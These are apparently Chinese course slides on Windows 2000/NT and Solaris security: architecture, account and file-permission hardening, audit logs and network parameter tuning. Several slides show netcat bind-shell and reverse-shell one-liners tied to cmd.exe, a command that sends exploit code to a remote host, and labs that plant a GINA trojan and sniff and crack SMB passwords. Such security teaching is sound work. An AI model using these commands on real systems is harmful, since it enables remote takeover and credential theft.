操作系统安全技术

课程目的了解win2K系统的设计原理了解Win2K的安全特性能够对win2K系统进行安全配置授课方式：讲解、演示、学员实际操作中国科学院计算技术研究所教育中心赵凤伟制作了解日常选择的安装分区是什么？是否关默认服务是否采用默认安装对win2K是否配置过本地安全策略为什么要介绍windowsNT安全WindowsNT体系构架WindowsNT安全基础WindowsNT日常安全配置WindowsNT的审计分析为什么要介绍windowsNT的安全系统安全评测标准系统面临很多威胁黑客攻击手段系统漏洞导致的损失系统安全评测标准1985年，美国国防部公布《可信计算机系统评估准则》（TCSEC）即桔皮书

TCSEC安全等级

安全级别描述D最低的级别。如MS-DOS计算机，没有安全性可言C1灵活的安全保护。系统不需要区分用户。可提供根本的访问控制。C2灵活的访问安全性。系统不仅要识别用户还要考虑唯一性。系统级的保护主要存在于资源、数据、文件和操作上。NT属于C2级的系统B1标记安全保护。系统提供更多的保护措施包括各式的安全级别。如AT＆T的SYSTEMV和UNIXwithMLS以及IBMMVS/ESAB2结构化保护。支持硬件保护。内容区被虚拟分割并严格保护。如TrustedXENIXandHoneywellMULTICSB3安全域。提出数据隐藏和分层，阻止层之间的交互。如HoneywellXTS-200A校验级设计。需要严格的准确的证明系统不会被危害，而且提供所有低级别的因素。如HoneywellSCOMP基于C2级标准的安全组件 灵活的访问控制WindowsNT支持C2级标准要求的灵活访问控制。要求包括允许对象的属主能够完全控制谁可以访问这个对象及什么样的访问权限。 对象再利用WindowsNT很明确地阻止所有的应用程序不可访问被另一应用程序使用所占用资源内的信息（比如内存或磁盘）。这种安全面貌是NT没有能力恢复已在磁盘上删除的文件的主要原因。 强制登陆与WindowsforWorkgroups、Windows95和98不同，WindowsNT用户在能访问任何资源前必须通过登陆来验证他们的身份。这也是另一个原因缺乏这种强制登陆的NT要想达到以前的C2级的标准就必须禁止网络功能。 审计因为WindowsNT采用单独地机制来控制对任何资源的访问，所以这种机制可以集中地记录下所有的访问活动。 控制对象的访问WindowsNT不允许直接访问系统里的资源，这种不许直接访问是允许访问控制的关键。在允许访问之前，用户或应用程序的权限首先被验证被攻击的前几种操作系统MicrosoftWindows31663000UNIX22544605CISCOIOS7821832被攻击最多的通用WEB服务器被攻击的产品占有用户的百分比被攻击的次数MicrosoftIIS41.0617797201ApacheGroupApache10.6212602NetscapeEnterpriseServer9.074892IplanetE-commerceSolution0.13124造成的损失2003-8-15全球受冲击波里蠕虫感染的机器超过34万台。8月1日下午微软公司网站被黑，一个多小时无法访问。为什么要介绍windowsNT安全WindowsNT体系统构架WindowsNT安全基础WindowsNT安全日常配置WindowsNT的审计分析WindowsNT体系统构架服务管理器服务进程系统支持进程本地安全验证服务Windows登录会话管理器应用程序环境子系统Svchost.exeWinmgmt.exeSpoolerServices.exe任务管理器Windows浏览器用户级应用程序子系统动态链接库OS/2POSIXWin32系统服务调度进程核心可调用接口I/O设备管理器设备、文件驱动程序文件系统缓存管理器即插即用设备管理器虚拟内存管理器进程和线程注册表配置管理器NTdll.dllWin32UserGDI图形驱动HALMicrokernel为什么要介绍windowsNT安全WindowsNT体系构架WindowsNT安全基础WindowsNT安全日常配置WindowsNT的审计分析windowsNT安全模型LogonprocessSAMUserAccountDatabaseSecurityPolicyDatabaseLSAAuditlogWin32applicationWin32subsystemSecurityReferenceMonitorUsermodeKernelmodeSecuritypolicyAuditmessageWindowsNT安全子系统WinlogonGINALocalSecurityAuthority(LSA)AuthenticationPackagesSecuritySupportProvidersSecurityAccountManagerNetlogonSSPI安全的要素安全帐户管理器安全标识符SID标识了用户、组和计算机的唯一性，不仅仅是在某台特定的电脑上还包括和其它计算机交互的时候。为了确保SID的唯一性，它们是综合计算机名字、当前时间、以及处理当前用户模式线程所花费CPU的时间所建立起来的。S-1-5-16349933112989372637-500安全访问令牌安全描述符访问控制列表进程地址空间系统地址空间线程线程线程进程和线程什么是进程？代表了运行程序的一个实例每一个进程有一个私有的内存地址空间什么是线程？进程内的一个执行上下文进程内的所有线程共享相同的进程地址空间每一个进程启动时带有一个线程运行程序的“主”函数可以在同一个进程中创建其他的线程可以创建额外的进程系统进程基本的系统进程smss.exeSessionManagercsrss.exe

子系统服务器进程winlogon.exe

管理用户登录services.exe

包含很多系统服务lsass.exe

管理IP安全策略以及启动ISAKMP/Oakley(IKE)和IP安全驱动程序。(系统服务)产生会话密钥以及授予用于交互式客户/服务器验证的服务凭据(ticket)。(系统服务)svchost.exe

包含很多系统服务，检查注册表中的位置来构建需要

加载的服务列表SPOOLSV.EXE将文件加载到内存中以便迟后打印。(系统服务)explorer.exe

资源管理器internat.exe

托盘区的拼音图标

系统进程树smss.exe

对话管理器

第一个创建的进程

引入参数

HKLM\System\CurrentControlSet\Control\SessionManager

装入所需的子系统(csrss)，然后winlogoncsrss.exe Win32子系统winlogon.exe

登录进程：装入services.exe和lsass.exe

显示登录对话框（“键入CTRL+ALT+DEL，登录）当有人登入，运行在HKLM\Software\Microsoft\WindowsNT\WinLogon\Userinit

中的进程（通常只是userinit.exe)services.exe服务控制器：也是几项服务的出发点Svchost.exe

服务的开始进程不是services.exe的一部分

(由HKLM\System\CurrentControlSet\Services驱动)lsass.exe

本地安全验证服务器（打开SAM）userinit.exe

登陆之后启动。启动外壳（通常是Explorer.exe—见

HKLM\Software\Microsoft\

WindowsNT\CurrentVersion\WinLogon\Shell)

装入配置文件，恢复驱动器标识符映象，然后退出（因此，浏览器单独显示）

explorer.exe

和它的孩子是所有交互式应用的创建者

附加的系统进程•mstask.exe

允许程序在指定时间运行。(系统服务)•regsvc.exe

regsvc.exe

允许远程注册表操作。(系统服务)•winmgmt.exe

提供系统管理信息(系统服务)。•inetinfo.exe

通过Internet信息服务的管理单元提供信息服务连接和管理。(系统服务)•tlntsvr.exe

允许远程用户登录到系统并且使用命令行运行控制台。(系统服务)•termsrv.exe

提供多会话环境允许客户端设备访问虚拟的Windows2000Professional桌面会话以及运行在服务器上的桌面会话基于Windows的程序。(系统服务)•dns.exe

应答对域名系统(DNS)名称的查询和更新请求。(系统服务)试验（一）用ntsd

结束正常无法结束的进程Ntsd–cq–ppid试验（二）使用listdlls

分析winlogon进程模块信息配置devel5插入winlogon

同时测试结果用listdlls

查看winlogon是否多了wshtcpip.dll用fc命令比较两次不用输出结果Unlocker

强制删除木马文件Ftype

修复系统关联文件试验（三）使用listdlls

分析winlogon进程模块信息植入msgina木马用listdlls

查看winlogon的gina

是否正常查看被劫持的登陆密码Ssdt

木马分析Win32KernelRootkitsmodifythebehaviourofthesystembyKernelNativeAPIhooking.ThistechniqueistypicallyimplementedbymodifyingtheServiceTableentriesintheServiceDescriptorTable(SDT).Suchmodificationensuresthatareplacement(hook)functioninstalledbyarootkitiscalledpriortotheoriginalnativeAPI.ThereplacementfunctionusuallycallstheoriginalnativeAPIandmodifiestheoutputbeforereturningtheresultstotheuser-spaceprogram.Thistechniqueallowskernelrootkitstohidefiles,processes,andtopreventprocesstermination在user-space和systemservice之间是通过相应的dllsexportapi实现的例1writedatatoanopenfile

由kernel32.dllwritefile

api

wirtefile

api在内核层由zwwritefilenativeapithatisexportedbyntdll.dll

在内核层通过中断技术实现zwwritefile1-MOVEAX,0ED2-LEAEDX,DWORDPTRSS:[ESP+4]3-INT2E4-RETN24注：0EDistheservicenumberofthezwwritefile

ItwillbeusedtooffsetintotheServiceTable(SystemServiceDispatchTable)inkernel-spacetolocatetheaddressofthefunctionthatimplementsthewritefileservice

ServiceDescriptorTabletypedef

struct

ServiceDescriptorTable{ SDEServiceDescriptor[4];}SDT;typedef

struct

ServiceDescriptorEntry{PDWORDServiceTable;PDWORDCounterTableBase;DWORDServiceLimit;PBYTEArgumentTable;}SDE;ServiceTable

的值就是指向zwwritefile

whichcontainstheactualcodetowritetofilesProcessHidingbyHookingZwQuerySystemInformation

UseruseToolHelpAPIstoobtainalistofallrunningprocessesToolhepAPIcallZWQUERYSYSTEMINFORMATIONexportedbyntdll.dllinkernelmodeHackermodifythefunctionpointerinservicetable(ZWQUERYSYSTEMINFORMATION)toareplacementfunctionThereplacementfunctionfirstcallstheoriginalZwQuerySystemInformationAPItoobtainanarraycontaininginformationofallrunningprocess.Thereturnedarrayisthenmodifiedtoremovetheentrycontainingtheprocesstobehidden.Finally,themodifiedresultisreturnedtotheuser-spaceprogram.Thiseffectivelypreventstheuser-spaceprogramfrom"seeing"thehiddenprocess.sdtrestoreC:\>sdtrestoreSDTrestoreVersion0.1Proof-of-ConceptbySIG^2G-TEC(.sg)KeServiceDescriptorTable8046DFA0KeServiceDecriptorTable.ServiceTable804742B8KeServiceDescriptorTable.ServiceLimit248ZwAllocateVirtualMemory10--[hookedbyunknownatF754CE74]--ZwCreateFile20--[hookedbyunknownatF754CA85]--ZwCreateKey23--[hookedbyunknownatF754CC5E]--ZwCreateProcess29--[hookedbyunknownatF754CDB7]--ZwDeleteFile34--[hookedbyunknownatF754C80C]--ZwGetTickCount4C--[hookedbyunknownatF754CE27]--ZwLoadDriver55--[hookedbyunknownatF754CBF2]--ZwQueryDirectoryFile7D--[hookedbyunknownatF754C6E8]--ZwQuerySystemInformation97--[hookedbyunknownatF754C623]--ZwSetInformationFileC2--[hookedbyunknownatF754C8A8]--NumberofServiceTableentrieshooked=10WARNING:THISISEXPERIMENTALCODE.FIXINGTHESDTMAYHAVEGRAVECONSEQUENCES,SUCHASSYSTEMCRASH,DATALOSSORSYSTEMCORRUPTION.PROCEEDATYOUROWNRISK.YOUHAVEBEENWARNED.FixSDTEntries(Y/N)?:y[+]PatchedSDTentry10to804A257F[+]PatchedSDTentry20to80497EF9[+]PatchedSDTentry23to804B2483[+]PatchedSDTentry29to804A9212[+]PatchedSDTentry34to804D0584[+]PatchedSDTentry4Cto80463FF2[+]PatchedSDTentry55to8052DC72[+]PatchedSDTentry7Dto80498541[+]PatchedSDTentry97to80493B5B[+]PatchedSDTentryC2to80498C08试验1iceswordtoviewsdt

2usesdtrestoretorestorethesdtWin2K服务基础TCP/IP端口与服务NetBios协议RPC服务公共互连网络文件系统（CIFS）练习：1、查看端口与服务对应文件2、查看默认开放端口TCP/IP端口与服务nc-nvv192.168.x.x80连到192.168.x.x的TCP80端口nc-l-p80监听本机的TCP80端口nc-l-p5354-t-ec:\winnt\system32\cmd.exe远程主机端口与shell的绑定nc-t-ec:\winnt\system32\cmd.exe192.168.x.x5354绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口nc-nvv192.168.x.x80<c:\exploit.txt输送溢出代码到远程主机的80端口Smb与CifsSMB一种客户机/服务器、请求/响应协议。通过SMB协议，客户端应用程序可以在各种网络环境下读、写服务器上的文件，以及对服务器程序提出服务请求。此外通过SMB协议，应用程序可以访问远程服务器端的文件、以及打印机、邮件槽（mailslot）、命名管道（namedpipe）等资源Smb协议MicrosoftnetworkLanmanagerNtlmNtlmv2试验1通过网上邻居共享访问一个主机用cain截获smb通讯Sendtocracker.破解用户名与密码试验2用redbutton测试smb通讯的安全性Keylogger

木马为什么要介绍windowsNT安全WindowsNT体系构架WindowsNT安全基础WindowsNT日常安全配置WindowsNT的审计分析Win2K服务win2K日常安全配置基本安装配置要点帐号和口令安全管理文件夹访问控制权限本地安全策略注册表中的安全配置其它安全配置日常异常检测和日常维护帐号和口令安全SAMSyskey帐号和口令策略帐号和口令策略***在账户策略->密码策略中设定：

密码复杂性要求启用

密码长度最小值个人机8位，服务器10位以上

强制密码历史5次

最长存留期30天

***在账户策略->账户锁定策略中设定：

账户锁定3次错误登录

锁定时间20分钟

复位锁定计数20分钟

练习帐号和口令安全更改超级管理帐户名称取消guest帐号禁止某些帐号从本地或远程登录新建一名为administrator的普通帐号为用户合理地分配权限练习用户权限Administrators组Users组PowerUsers组BackupOperators组win2K日常安全配置基本安装配置要点帐号和口令安全管理文件夹访问控制权限本地安全策略注册表中的安全配置其它安全配置日常异常检测和日常维护文件系统安全Windows2000支持NTFS文件系统、文件分配表(FAT)和FAT32。NTFSFATFAT32运行Windows2000的计算机可以访问NTFS分区上的文件。运行带有ServicePack4或更高版本的WindowsNT4.0计算机可能可以访问某些文件。其他操作系统则无法访问。可以通过MS-DOS、所有版本的Windows、WindowsNT、Windows2000和OS/2访问。只能通过Windows95OSR2、Windows98和Windows2000访问。NTFS与FAT分区权限FAT32NTFSNTFS分区特点特殊权限所有者控制继承性移动/复制影响共享权限磁盘配额文件权限权限控制原则和特点1>权限是累计2>拒绝的权限要比允许的权限高3>文件权限比文件夹权限高4>利用用户组来进行权限控制5>权限的最小化原则win2K日常安全配置基本安装配置要点帐号和口令安全管理文件夹访问控制权限本地安全策略注册表中的安全配置其它安全配置日常异常检测和日常维护本地安全策略--本地策略审核策略：决定记录在计算机（成功/失败的尝试）的安全日志上的安全事件。用户权利分配：决定在计算机上有登录/任务特权的用户或组。安全选项：启用或禁用计算机的安全设置，例如数据的数字信号、administrator和guest的帐号名、软驱和光盘的访问、驱动程序的安装以及登录提示。win2K日常安全配置基本安装配置要点帐号和口令安全管理文件夹访问控制权限本地安全策略注册表中的安全配置其它安全配置日常异常检测和日常维护Regedit与Regedt32的区别regeditregedt32使用较新的Windows9x/me用户界面使用较早的windows3.1用户界面可搜索：键名、值名、值内容只能搜索键名可以搜索并编辑远程注册表可以搜索并编辑远程注册表在一个窗口中显示整个注册表对每一控制项显示各自的窗口可以导出、导入文本文件可以导出但不能导入文本文件不能导出或导入二进制文件可以导出并导入二进制文件不能提供“只读”模式提供“只读”模式，但不作为缺省形式不提供安全特性支持完整的WindowsNT/2000访问控制和审计存放在winnt文件夹里存放在winnt\system32文件里只完全支持Windows9x/me注册表数据类型（字符串、二进制、DWORD）支持全部WindowsNT/2000注册表数据类型/字符串、二进制、DWORD、多字符串、可扩展字符串、资源描述删除默认网络共享服务器:Key:HKLM\SYSTEM\CurrentControlSet\Services\lanmanserver\parametersName:AutoShareServerType:DWORDValue:0工作站：Key:HKLM\SYSTEM\CurrentControlSet\Services\lanmanserver\parametersName:AutoShareWksType:DWORDValue:0练习1、去除默认共享2、删除IE启动主页3、删除IE的主页修改限制注册表权限试验1通过regedt32修改run的访问权限2在run下添加或修改响应键值，看看结果安全模版与分析工具默认工作站(basicwk.inf)默认服务器(basicsv.inf)默认域控制器(basicdc.inf)兼容工作站或服务器(compatws.inf)安全工作站或服务器(securews.inf)高度安全工作站或服务器(hisecws.inf)专用域控制器(dedicadc.inf)安全域控制器(securedc.inf)高度安全域控制器(hisecdc.inf)

练习：做一个适合普通办公用机的安全模版，将其导出。模板配置试验通过mmc打开安全模板和安全配置分析修改一个模板如securews

另存为一新模板在安全配置与分析打开一数据库，输入名字，导入新建模板查看系统配置win2K日常安全配置基本安装配置要点帐号和口令安全管理文件夹访问控制权限本地安全策略注册表中的安全配置其它安全配置日常异常检测和日常维护其它安全配置组策略EFS加密文件系统IIS安全IE安全EFS加密文件系统特性：1、采用单一密钥技术2、核心文件加密技术仅用于NTFS，使用户在本地计算机上安全存储数据3、加密用户使用透明，其他用户被拒4、不能加密压缩的和系统文件，加密后不能被共享、能被删除建议加密文件夹，不要加密单独的文件EFS恢复代理故障恢复代理就是获得授权解密由其他用户加密的数据的管理员必须进行数据恢复时，恢复代理可以从安全的存储位置获得数据恢复证书导入系统。默认的超级管理员就是恢复代理使用条件：当加密密钥丢失练习：1、用一个名为test的普通用户将文件aa.txt加密2、使用一个名为张三的在管理员组帐号打开3、使用系统默认的超级管理员打开IIS的安全配置

安装IIS注意事项

Web站点主目录目录安全性练习SSL安全机制

SSL（加密套接字协议层）位于HTTP层和TCP层之间，建立用户与服务器之间的加密通信，确保所传递信息的安全性。使用SSL安全机制时，首先客户端与服务器建立连接，服务器把它的数字证书与公共密钥一并发送给客户端，客户端随机生成会话密钥，用从服务器得到的公共密钥对会话密钥进行加密，并把会话密钥在网络上传递给服务器，而会话密钥只有在服务器端用私人密钥才能解密，这样，客户端和服务器端就建立了一个唯一的安全通道。安装IIS注意事项选择安装组件INTERNET服务管理器INTERNET服务管理器（HTML）WORLDWIDEWEB服务器公用文件文档文件传输（FTP）服务器避免安装在主域控制器上删除inetpub下的scripts目录IIS工具ToolIISLockTool具有以下功能和特点：•帮助管理员设置

IIS安全性；•此工具可以在4IIS4和

IIS5上使用；•帮助管理员去掉对本网站不必要的一些服务，使

IIS在满足本网站需求的情况下运行最少的服务下载地址•http:///default.aspx?scid=kb;en-us;309508IE的安全设置常规安全内容高级win2K日常安全配置基本安装配置要点帐号和口令安全管理文件夹访问控制权限本地安全策略注册表中的安全配置其它安全配置日常异常检测和日常维护日常异常检测异常端口检测异常进程检测异常启动项检测异常程序检测练习：1、异常端口检测2、检测异常启动程序和进程MBSAMicrosoftBaselineSecurityAnalyzer从MBSA主页下载MBSA：/technet/security/tools/mbsahome.mspx

部署SUShttp:///fwlink/?LinkId=6930

日常维护--备份和还原数据将文件备份到文件或磁带备份“系统状态”数据使用备份向导备份文件计划备份将文件备份到MicrosoftExchange为什么要介绍windowsNT安全WindowsNT体系构架WindowsNT安全基础WindowsNT日常安全配置WindowsNT的审计分析安全审核与日志

访问文件夹的审核审核策略安全事件查看并分析审计成功：可以确定用户或服务获得访问指定文件、打印机或其他对象的频率审计失败：警告那些可能发生的安全泄漏windowsNT日志系统日志

跟踪各种各样的系统事件，比如跟踪系统启动过程中的事件或者硬件和控制器的故障。

应用程序日志

跟踪应用程序关联的事件，比如应用程序产生的象装载DLL（动态链接库）失败的信息将出现在日志中。安全日志

跟踪事件如登录上网、下网、改变访问权限以及系统启动和关闭。注意：安全日志的默认状态是关闭的。日志Internet信息服务

FTP日志默认位置：%systemroot%/system32logfiles/msftpsvc1默认每天一个日志Internet信息服务WWW日志默认位置：：%systemroot%/system32/logfiles/w3svc1，默认每天一个日志FTP日志和WWW日志文件名通常为ex（年份）（月份）（日期），例如ex001023就是2000年10月23日产生的日志，用记事本就可直接打开Scheduler服务日志默认位置：%systemroot%/schedlgu.txt日志分析FTP日志分析，如下例：#Software:MicrosoftInternetInformationServices5.0（微软IIS5.0）#Version:1.0（版本1.0）#Date:2000102303:11:55（服务启动时间日期）03:11:55[1]USERadministator-331（IP地址为

用户名为administator

试图登录）03:11:58[1]PASS-530（登录失败）03:12:04[1]USERnt-331（

IP地址为

用户名为

nt的用户试图登录）03:12:06[1]PASS-530（登录失败）03:12:32[1]USERadministrator-331（（

IP地址为

用户名为administrator试图登录）03:12:34[1]PASS230（登录成功）（登录成功）03:12:41[1]MKDnt550（新建目录失败）03:12:45[1]QUIT550（退出FTP程序）日志分析http日志#Software:MicrosoftInternetInformationServices5.0#Version:1.0#Date:2003-08-1105:30:32#Fields:datetimec-ip

cs-usernames-ips-portcs-methodcs-uri-stem

cs-uri-querysc-statuscs(User-Agent)2003-08-1105:30:3243-4380GET/scripts/..%5c..%5cwinnt/system32/cmd.exe/c+dir+c:\200Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)2003-08-1107:24:0143-4380GET/scripts/..%5c..%5cwinnt/system32/cmd.exe/c+copy%20c:\winnt\system32\cmd.exe%20venus.exe502Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)2003-08-2003:00:3543-4380GET/<Rejected-By-UrlScan>~/scripts/..%c1%af../winnt/system32/cmd.exe404-总结为什么要介绍windowsNT安全WindowsNT体系构架WindowsNT安全基础WindowsNT日常安全配置WindowsNT的审计分析课程目的掌握Solaris系统的安全配置掌握Solaris系统的异常分析及审计授课方式：讲解、演示、学员上机操作

本课程操作、实验环境：Solaris_9_x86Solaris系统安全Solaris系统安全配置Solaris系统审计分析Solaris系统安全配置Solaris系统基本安装配置帐号和口令安全文件系统安全其它安全配置网络服务安全异常检测和维护Solaris系统安装不安装多余组件停止不必要的服务打最新的补丁设置aset关闭无用端口编辑/etc/inet/inetd.conf文件，注释调无用的端口。（保留Telnet、Xwindows端口）参照/etc/inet/services文件中的端口。查看服务对应的端口Solaris基本配置关闭无用端口/etc/rc3.dS34dhcp

S76snmpdx

S80mipagent

S15nfs.server

S50apache

S77dmi将大写的S改为小写xSolaris基本配置/etc/rc2.d

S70uucp

S71ldap.client

S72autoinstall

S73cachefs.daemon

S73nfs.client

S74autofs

S74xntpd

S80lp

S94Wnn6

将大写的S改为小写x如果想关闭Xwindows将S71rpc、S99dtlogin

改名Solaris基本配置Solaris补丁安装Showrev

－p显示安装补丁版本信息Solaris补丁分类Point

Cluster

补丁下载地址：/pub-cgi/show.pl?target=patches/patch-access&nav=patchpageSolaris系统安全配置asetSecuritylevelstasksReportsAsetfilesConfigurationSecuritylevelsLowMediumhightasksSystemfilespermissionsverficationSystemfilescheckUser/groupcheckSystemconfigurationfilescheckEnvironmentcheckEepromcheckFirewallsetupReports/usr/aset/reports

/usr/aset/aset–n通过邮件把报表发送给其他人AsetfilesMasterfilesTunefilesUid_aliasesfilesChecklistfilesEnvironmentfilesConfigurationChoosewhichtaskstorunSpecifydirectoriesforchecklisttasksScheduleexecutionSolaris系统安全配置Solaris系统基本安装配置帐号和口令安全文件系统安全其它安全配置网络服务安全禁用和删除不必要的帐号sys、uucp、nuucp、listen、lp、adm简单的办法是在/etc/shadow的password域前加NP。Passwd

－luser1删除账号#userdeluser1Solaris系统帐号安全练习8、9Solaris系统帐号安全强迫用户修改密码

passwd–fusername禁止用户修改密码

Passwd–n10–x7username设置用户的期限Useradd–e12/25/99username

Solaris系统帐号安全创建var/adm/loginlog

记录登陆过程设置chmod600/var/adm/loginlogChownsys/var/adm/loginlogRoot帐号安全性确保root只允许从控制台登陆限制知道root口令的人数使用强壮的密码三个月或者当有人离开公司是就更改一次密码使用普通用户登陆,用su取得root权限,而不是以root身份登录Solaris系统帐号安全Root帐号安全性设置umask

为077,在需要时再改回022请使用全路径执行命令不要允许有非root用户可写的目录存在root的路径里Solaris9系统默认禁止root只能从console登陆Solaris系统帐号安全监控用户su过程在/etc/default/su里Uncomment

sulog=/var/adm/sulogconsole=/dev/console用的su过程可以在控制台上显示禁止root用户远程登录编辑/etc/default/login文件，添加 CONSOLE=/dev/null禁止root远程FTP登录在/etc/ftpusers里加上root。在SSH

配置文件加：permitRootLogin

=

noSolaris系统帐号安全Solaris系统帐号安全记录用户未成功登陆系统的日志

/var/adm/loginlog▪touch/var/adm/loginlog限制登陆shell/usr/lib/rsh

用户被限制在自己的目录下用户只能使用PATH路径下的命令不能使用重定向输出符Solaris帐号口令安全设置密码策略编辑“/etc/default/passwd”

修改MAXWEEKS=4

口令至少每隔4星期更改一次

修改MINWEEKS=1口令至多每隔1星期更改一次

添加WARNWEEKS=3修改口令后第三个星期会收到快要修改口令的信息

修改PASSLENGTH=6用户口令长度不少于6个字符实验4Solaris帐号口令安全设置sysadmin组口令删除sysadmin组内不重要用户禁用User用户练习Solaris系统安全配置Solaris系统基本安装配置帐号和口令安全文件系统安全其它安全配置网络服务安全ls–altestdrwxr-xr-x3rootroot1024Sep1311:58test模式位通常由一列10个字符来表示，每个字符表示一个模式设置1:表示文件类型。d表示目录，-表示普通文件，l表示链接文件等等

每个文件和目录有三组权限，一组是文件的拥有者、一组是文件所属组的成员、一组是其他所有用户。

"r"表示可读，"w"表示可写，"x"表示可执行。一共9位(每组3位)，合起来称为模式位(modebits)Solaris文件系统的安全Solaris文件系统的安全Chmod

改变文档或目录之属性。如#chmod755testChown改变文档或目录之拥有权#chownuser1file1;chown-Ruser1dir1Chgrp改变文档或目录之群组拥有权

#chgrp

group1

file1Solaris文件系统的安全SUID/SGIDSUID表示"设置用户ID“;SGID表示"设置组ID"。当用户执行一个SUID文件时，用户ID在程序运行过程中被置为文件拥有者的用户ID。如果文件属于root，那用户就成为超级用户。SUID程序代表了重要的安全漏洞，特别是SUID设为root的程序。Solaris文件系统的安全SUID/SGID

#find/-perm-4000-ls

find列出所有设置了SUID（“4000”）或SGID（“2000”）位的普通文件（“f”）。

chmoda-s<文件名>”移去相应文件的“s”位。实验6Solaris文件系统的安全设置系统的粘贴位

chmod1755files

ls–l/var/mail

drwxrwxrwt…….MailSolaris文件系统的安全限制/etc下文件的使用

find/etc/-typef–perm–g+w–print(查找组可写文件）

find/etc/-typef–perm–o+w–print

（查找其他用户可写文件）

chmod–Rgo-w/etc

（改变任何错误的组/其他用户的写权限）

Solaris文件系统的安全加密文件

cryptkey<clearfile>encryptedfilecryptkey<encryptedfile

Solaris文件系统安全备份命令cp—虽然常用来拷贝单独一个文件，但cp（copy）命令支持一个递归选项（-R）来拷贝一个目录和它里面所有的文件和子目录。例如把mydir中所有内容拷贝到mydir2中：cp-Rmydirmydir2。tar—tar（TApe

aRchiver）命令可以创建、把文件添加到或从一个tar档案（或“tar文件”）中解开文件。cpio—这个SVR4和GNU工具把文件拷贝进或拷贝出一个cpio或tar档案。与tar相似。

练习找出系统中的setuid,setgid,sticky文件Solaris系统安全配置Solaris系统基本安装配置帐号和口令安全文件系统安全其它安全配置网络服务安全日常异常检测和维护系统资源的监控进程内存磁盘进程结构ProcessKernelthreadUserlwp查看进程Ps–ef

Ps–ecl

进程的优先级别Real-timeSystemprocessesTimesharingprocessesInteractiveprocesses修改进程的优先级别Nice(nice+4or-10command)Priocntl

priocntl–e–cRT–t500–p20结束重启进程KillpidKill-9pidKill-HUPpid系统性能检测Sac/usr/bin/sacSadc/usr/lib/sa/sadc系统性能检测VmstatIostat–xtcDf

网络性能监测PingSpraySnoopNetstatnfsstat启动网络参数设定设置/etc/init.d/inetinit文件在系统作为路由器的情况中执行

#ndd–set/dev/ip

ip_forwarding1关闭数据包转发

#ndd–set/dev/ip

ip_forwarding0(或/etc/notrouter)忽略重定向数据包（否则有遭到DOS的隐患）

#ndd–set/dev/ip

ip_ignore_redirects1

不发送重定向数据包

#ndd–set/dev/ip

ip_send_redirects0禁止转发定向广播

#ndd–set/dev/ip

ip_forward_directed_broadcasts0禁止转发在数据源设置了路由的数据包

#ndd–set/dev/ip

ip_forward_src_routed0启动网络参数设定ICMP协议参数设置/etc/init.d/inetinit文件关闭响应echo广播

＃ndd–set/dev/ip

ip_respond_to_echo_boadcast0关闭响应时间戳广播

#ndd–set/dev/ip

ip_respond_to_timestamp_broadcast0关闭地址掩码广播

#ndd–set/dev/ip

ip_respind_to_address_mask_broadcast0ARP攻击防止减少过期时间#ndd–set/dev/arp

arp_cleanup_interval60000#ndd-set/dev/ip

ip_ire_flush_interval60000默认是300000毫秒（5分钟）加快过期时间，并不能避免攻击，但是使得攻击更加困难，带来的影响是在网络中会大量的出现ARP请求和回复请不要在繁忙的网络上使用。ARP攻击防止建立静态ARP使用arp–ffilename加载如下文件

08:00:20:ba:a1:f2

08:00:20:ee:de:1f

这是一种很有效的方法，而且对系统影响不大。缺点是破坏了动态ARP协议禁止ARPifconfiginterface–arp

网卡不会发送ARP和接受ARP包。但是使用前提是使用静态的ARP表，如果不在apr表中的计算机，将不能通信TCP协议参数Synflood（半开式连接攻击）SYNFLOOD原理 请求方

服务方

>

发送

SYN消息

回应

SYN-ACK

<

>

ACK

ndd–set/dev/tcptcp_conn_req_max_q04096默认连接数为1024连接耗尽攻击ndd–set/dev/tcp

tcp_conn_req_max_q1024默认连接数为128防止TCP序列号预测攻击(ip欺骗)建议在/etc/default/inetinit中增加如下的生成初始化序列号设置来防止TCP序列号预测攻击(ip欺骗):TCP_STRONG_ISS=2

TCP协议参数堆栈缓冲区溢出禁止堆栈缓冲区溢出在/etc/system里加上如下语句，禁止缓冲溢出：

echo

"set

noexec_user_stack=1"

>>

/etc/system

echo

"set

noexec_user_stack_log=1"

>>

/etc/system

Solaris系统安全配置Solaris系统基本安装配置帐号和口令安全文件系统安全其它安全配置网络服务安全日常异常检测和维护Solaris系统及网络服务/etc/inet/inetd.conf/etc/inet/inetd.conf决定inetd启动网络服务时，启动哪些服务，用什么命令启动这些服务，以及这些服务的相关信息

/etc/service/etc/services文件记录一些常用的接口及其所提供的服务的对应关系。

/etc/protocols/etc/protocols文件记录协议名及其端口的关系。/etc/Rc*.d/etc/inittab

inittab定义了系统缺省运行级别，系统进入新运行级别需要做什么Inetd服务#more/etc/inetd.conf#systatstreamtcp

nowaitroot/usr/bin/ps

ps-ef#系统进程监控服务，允许远程察看进程#netstatstreamtcp

nowaitroot/usr/bin/netstat

netstat-finet#网络状态监控服务，允许远程察看网络状态#timestreamtcp6nowaitrootinternal#timedgramudp6waitrootinternal#网络时间服务，允许远程察看系统时间#echostreamtcp6nowaitrootinternal#echodgramudp6waitrootinternal#网络测试服务，回显字符串Inetd服务#namedgram

udpwaitroot/usr/sbin/in.tnamed

in.tnamed#named，DNS服务器#telnetstreamtcp6nowaitroot/usr/sbin/in.telnetd

in.telnetd#telnet服务器#ftpstreamtcp6nowaitroot/usr/sbin/in.ftpd

in.ftpd-a#ftp服务器/etc/servicesMore/etc/services#Networkservices,Internetstyle#tcpmux1/tcpecho7/tcpecho7/udpdiscard9/tcpsinknulldiscard9/udpsinknullsystat11/tcpusersdaytime13/tcpdaytime13/udpnetstat15/tcpSolaris系统服务安全在inetd.conf中关闭不用的服务

#cp/etc/inet/inetd.conf/etc/inet/inetd.conf.bak然后用vi编辑器编辑inetd.conf文件，对于需要注释掉的服务在相应行开头标记“#”字符即可。注:Ftp和Telnet服务在不需要时也